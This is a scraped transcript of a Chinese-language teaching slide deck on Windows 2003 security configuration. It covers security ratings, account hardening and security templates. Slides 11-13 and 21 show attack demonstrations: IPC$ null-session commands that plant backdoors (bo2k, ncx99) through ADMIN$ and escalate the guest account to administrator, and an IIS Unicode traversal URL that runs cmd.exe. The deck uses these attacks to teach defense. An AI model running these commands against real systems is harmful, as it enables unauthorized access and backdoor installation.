Download
windows2003 n.
Skip this Video
Loading SlideShow in 5 Seconds..
搭建安全操作系统- Windows2003 安全配置 PowerPoint Presentation
Download Presentation
搭建安全操作系统- Windows2003 安全配置

搭建安全操作系统- Windows2003 安全配置

165 Views Download Presentation
Download Presentation

搭建安全操作系统- Windows2003 安全配置

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. 学习情景3 搭建安全操作系统- Windows2003 安全配置 陈晓红 www.xjqg.edu.cn

  2. 学习任务 任务3-1:系统漏洞与漏洞修补 任务3-2:用户账户安全配置 任务3-3:Windows2003安全策略 任务3-4:使用IPSec加强系统安全性 任务3-5: Windows2003的NTFS特性 任务3-6: 利用注册表增加系统安全性 任务3-7: Windows2003日志管理

  3. 任务3-1:系统漏洞与漏洞修补 • 学习目标: • 了解操作系统安全概念 • 了解计算机操作系统安全评估 • 知道系统漏洞,能够修补漏洞 • 学习内容 : • 操作系统安全概念 • 计算机操作系统安全评估标准 • 系统漏洞 • 漏洞修补

  4. 操作系统安全概念 • 一般意义上,如果说一个计算机系统是安全的,那么是指该系统能够控制外部对系统信息的访问。也就是说,只有经过授权的用户或代表该用户运行的进程才能读、写、创建或删除信息。

  5. 计算机操作系统安全评估标准 • 美国可信计算机安全评估标准(TCSEC),是计算机系统安全评估的第一个正式标准。----- “桔皮书”标准 • TCSEC将计算机系统的安全划分为4个等级、7个级别。 (1)D级 (2)C级:C1级,C2级 (3)B级:B1,B2,B3 (4)A级

  6. 校验级保护,并提供B3级安全手段 A 级 安全域,数据隐藏与分层、屏蔽 B3 级 结构化内容保护,支持硬件保护 B2 级 标记安全保护,如System V等 B1 级 有自主的访问安全性,区分用户 C2 级 不区分用户,基本的访问控制 C1 级 没有安全性可言,例如MS DOS D 级 操作系统安全级别

  7. 操作系统安全级别

  8. 国内的安全操作系统评估 • 《计算机信息安全保护等级划分准则》将计算机信息系统安全保护等级划分为五个级别: 1、用户自主保护级 2、系统审计保护级 3、安全标记保护级 4、结构化保护级 5、安全域级保护级

  9. 系统漏洞 • 不安全服务 • Remote Registry Service • Messenger • 默认共享 • 查看默认共享:net share • 关闭默认共享:net share c$ /del 允许远程注册表操作 (禁止) 信使服务

  10. IPC共享问题 什么IPC?(Internet Process Connection) IPC$空会话连接!! 管理共享(C$、d$、Admin$)!!

  11. IPC攻击演示 E:\>net use \\victim\ipc$ “” /user:”” E:\>net view \\victim 结果:获得victim主机共享资源列表 Continue…… E:\>net use y: \\victim\share “xxx” /user:”xxxx” 结果:victim主机的share目录被映射为Y盘

  12. IPC攻击演示 Now,I can cortrol you E:\>net use \\victim\IPC$ “xx” /user:”xxx” E:\>copy bo2K.exe \\victim\ADMIN$ E:\>at \\victim time c:\winnt\bo2k.exe

  13. IPC攻击演示 E:\>copy ncx99.exe \\victim\ADMIN$ E:\>at \\victim 10:10 c:\winnt\ncx99 E:\>telnet victim 99 net user guest guest /add net localgroup Administrators guest /add ………………...

  14. IPC问题的解决 • 注册表修改 • 取消为管理而设的共享 • 限制IPC空会话连接 • 软件防火墙 • 禁止来自Internet的NetBios访问

  15. 系统漏洞 • 系统漏洞扫描助手(演示)

  16. Windows 典型系统漏洞介绍 • 输入法漏洞 • MIME头漏洞 • Unicode漏洞 • 缓存溢出漏洞 • ……

  17. 输入法漏洞 演示

  18. MIME邮件头漏洞 • MIME简介MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网络邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。

  19. 攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不能正确处理这个MIME所指定的可执行文件附件。攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不能正确处理这个MIME所指定的可执行文件附件。 • IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是VIDEO CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文件呢?IE会提示用户是否执行!但当攻击者更改MIME类型后,IE就不再提示用户是否执行而直接运行该附件!从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。

  20. MIME邮件头漏洞 Content-type语句,用来指明传递的就是MIME类型的文件。 Content-Type: audio/x-wav; name=“test.exe" Content-Transfer-Encoding: base64 Content-ID: <THE-CID> Oh,why? internet It’s for you

  21. Unicode漏洞 • 微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令 • 当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件 • http://*.*.*.*/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir(Windows 2000漏洞编码)

  22. Unicode漏洞补救方法 (1)限制网络用户访问和调用CMD命令的权限 (2)若没必要使用SCRIPTS和MSADC目录,删除或改名; (3)安装Windows 系统时不要使用默认WINNT路径,可以改为其他的文件夹; (4) 下载Microsoft提供的补丁

  23. 系统漏洞修补 • 删除不必要的共享 • Windows Update • 360安全卫士(演示)

  24. 实验: • 实验3-1:在Windows 2003中关闭默认共享 • 实验3-2:隐藏用户账户 • 实验3-3: Windows 2003登录事件审核

  25. 任务3-2:用户账户安全配置 • 学习目标: • 了解用户账户的类型 • 掌握用户账户安全设置 • 学习内容 : • 什么是用户账户? • 用户账户的类型 • 本地用户账户安全设置

  26. 一、什么是用户账户? • 存在于Windows 2000、Windows xp、Windows2003中 • 系统中的一种对象 • 包含多种属性,如用户名、密码等 • 不同用户账户的配置环境不同 • 不同用户账户的用户名和密码不同 • 不同用户账户的SID不同

  27. SID是什么? • SID(安全标识符)是标识一个注册用户的惟一名字,它可用来标识一个用户或一组用户。 • SID由一串英文字母和数字组成的字符串。 • SID是在创建用户时,有系统根据当前的状态随即生成。

  28. 二、用户账户的类型 • 本地用户账户 • 使用“本地用户和组” 创建 • 存储在SAM数据库中 • 登录时进行本地身份验证 • 域用户账户 • 使用“AD用户和计算机” 创建 • 存储在AD数据库中 • 登录时进行网络身份验证

  29. SAM是什么? • SAM (Security Account Manager,安全账号管理器) • 安全账号管理器维护安全账号管理数据库,即SAM数据库。 • 存在于:C:\WINDOWS\system32\config • 负责本地身份认证

  30. 用户账户的创建 • 本地用户账户: • 本地用户和组-lusermgr.msc • Net user • 脚本 • 域用户帐户: • AD用户和计算机-dsa.msc • User add • 脚本

  31. 有关本地用户账户的讨论 • 一部分信息存储在注册表中 • 克隆用户账户 • 提升用户账户权限 • 隐藏用户账户

  32. 用户账户的密码 • 最长127个字符 • 存储在SAM数据库中获AD中 • 默认较弱的加密方法 • 空密码的问题 • 密码策略

  33. 三、本地用户账户安全设置 1.停用Guest用户把Guest账号禁用,并且修改Guest账号的属性,设置拒绝远程访问。

  34. 2.系统Administrator账号改名 防止管理员账号密码被穷举,伪装成普通用户。

  35. 3.创建一个陷阱用户 将管理员账号权限设置最低,延缓攻击企图。

  36. 4.不显示上次登录用户名 防止密码猜测,打开注册表编辑器并找到注册表项“HKEY_CURRENT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Dont-DisplayLastUserName”,把REG_SZ的键值改成1。

  37. 5.开启用户策略 可以有效的防止字典式攻击。 • 当某一用户连续5次录都失败后将自动锁定该账户,30分钟后自动复位被锁定的账户。

  38. 6.隐藏用户账户 防止黑客显示系统用户账户,穷举密码。 本地用户账户的信息不仅仅存放在SAM中,还有一部分存放在注册表 演示 相关实验:隐藏用户账户

  39. 实验: • 实验3-2:隐藏用户账户

  40. 任务3-3:Windows2003 安全策略 • 学习目标: • 了解安全策略和安全模板 • 了解安全配置和分析工具 • 掌握安全模板的使用 • 掌握安全配置和分析工具的使用 • 学习内容 : • 一、什么是安全策略 • 二、安全模板 • 三、安全配置和分析 • 四、与安全配置和分析相关的命令

  41. 一、什么是安全策略 安全策略是指在一个特定的环境里,为保证提供 一定级别的安全保护所必须遵守的规则。

  42. 本地安全策略简介 演示 相关实验:Windows 2003登录事件审核

  43. 权利和权限

  44. 二、安全模板 什么是安全模版? • 系统预制好的安全策略的设置,不同的安全模版有不同的定制

  45. 安全模板可用于定义: • 帐户策略 • 密码策略 • 帐户锁定策略 • Kerberos 策略 • 本地策略 • 审核策略 • 用户权限分配 • 安全选项 • 事件日志:应用程序、系统和安全的事件日志设置 • 受限制的组:安全敏感组的成员资格 • 系统服务:系统服务的启动和权限 • 注册表:注册表项的权限 • 文件系统:文件夹和文件的权限

  46. 演示 打开安全模版 默认安全模版:开始-程序-运行-mmc-添加安全模版 在不同的安全模版当中内置不同的安全级别

  47. 修改模版

  48. 添加新的模版

  49. 安全模版的应用 • 域:导入GPO.通过配置域或部门的安全性来简化域管理 • 本地:导入本地安全策略。 • 方法一:本地安全策略-右键“安全设置”-导入模版 • 方法二:使用“安全配置和分析”工具 • 方法三:Secedit 命令行工具

  50. 三、安全配置和分析